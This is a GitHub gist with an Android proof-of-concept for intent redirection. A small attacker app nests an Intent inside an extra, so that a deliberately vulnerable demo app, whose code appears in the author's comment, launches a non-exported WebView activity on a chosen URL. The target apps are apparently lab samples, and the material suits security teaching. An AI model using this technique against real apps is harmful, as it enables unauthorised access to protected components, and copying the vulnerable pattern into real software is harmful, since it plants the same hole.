Skip to content

Instantly share code, notes, and snippets.

@adon90

adon90/embededintentexploit.java

Created September 5, 2020 21:46
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save adon90/5c2816e8ecfec8e927a24f840c5500be to your computer and use it in GitHub Desktop.
Save adon90/5c2816e8ecfec8e927a24f840c5500be to your computer and use it in GitHub Desktop.
Download ZIP
Raw
embededintentexploit.java
package com.example.intentpoc;
import android.os.Bundle;
import androidx.appcompat.app.AppCompatActivity;
import android.content.Intent;
public class MainActivity extends AppCompatActivity {
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
Intent polla = new Intent();
polla.setClassName("com.example.myapplication", "com.example.myapplication.SecondActivity" );
polla.putExtra("adon_uri", "https://hackplayers.com");
Intent go = new Intent();
go.setClassName("com.example.myapplication", "com.example.myapplication.MainActivity" );
go.putExtra("extra_deep_link_intent", polla);
//startActivity(start);
startActivity(go);
}
}
@adon90
Copy link
Author

adon90 commented Sep 5, 2020
edited

Vulnerable Code:

MainActivity.java:


public class MainActivity extends AppCompatActivity {

    private WebView myWebView;
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
    }

    @Override
    protected  void onResume(){

        super.onResume();
        handleIntentExtras(getIntent());
}

    private void handleIntentExtras(Intent intent) {

        Intent deeplinkIntent = (Intent) intent.getParcelableExtra("extra_deep_link_intent");

        if (!(deeplinkIntent == null )) {
            startActivity(deeplinkIntent);

        }
    }
}

SecondActivity.java



public class SecondActivity extends AppCompatActivity {

    private WebView myWebView;
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_second);

        String uri = getIntent().getStringExtra("adon_uri");

        if (getIntent() == null || !getIntent().hasExtra("adon_uri")){

            finish();
            return;
        }

        myWebView = new WebView(this);
        myWebView.getSettings().setJavaScriptEnabled(true);

        //String data = "<html><body><h1>Hello, Zorra!</h1></body></html>";
        //myWebView.loadData(getIntent().getStringExtra("adon_uri"), "text/html", "UTF-8");
        //myWebView.loadUrl("https://www.google.com");
        myWebView.loadUrl(getIntent().getStringExtra("adon_uri"));
        setContentView(myWebView);


    }
}

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment